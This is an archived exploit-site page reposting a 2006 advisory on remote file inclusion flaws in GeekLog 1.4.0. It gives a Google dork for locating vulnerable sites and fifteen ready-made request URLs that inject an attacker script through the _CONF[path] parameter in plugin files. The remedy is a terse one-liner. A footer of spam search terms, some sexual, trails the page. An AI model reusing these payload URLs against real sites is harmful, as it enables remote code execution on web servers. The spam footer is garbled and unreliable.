about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities




2006-06-29 GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities
Rated as : High Risk

---------------------------------------------------------------------------

GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Google d0rk: "powered by geeklog"


Discovered By Kw3[R]Ln [ Romanian Security Team ] :
hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : GeekLog  
version : latest version [ 1.4 ]
URL : http://www.geeklog.net/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $_CONF[path] not sanitized.When register_globals=on an attacker
can exploit this vulnerability with a simple php injection script.

were [path] on some cases => www.site.com/[path]/public_html/index.php

#
http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]

#
http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script]

#
http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]
#http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]
#
http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]




---------------------------------------------------------------------------

Solution :
~~~~~~~~~~

declare variabel $_CONF[path]
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*

-------------------------------- [ EOF] ----------------------------------
securitydot.net - 2006-06-29

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 18:19:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
thisisesse php news r Se. sex india Www69.com Www.deseba smcboot Www sahila szhlg.cn search/exp gotobucket SXXARBE masala vid girls pict winload Se. nude reshm maxcpm.inf psg admin 18 year ca www.sunkin TinyPortal alan sex rituparna sex vidios sex movi CMS is Fre maxcpm.inf ingo Www.Sex700 call /search/ex www.yzmoth results f WWW.U.S.A News Searc news for c Crac Www sahila 200 /compo freebsd WWW.U.S.A WWW.SEX SE mono www.ahpyne /search/ex IPB 2..2.1 apache coy ass blak v mambamovie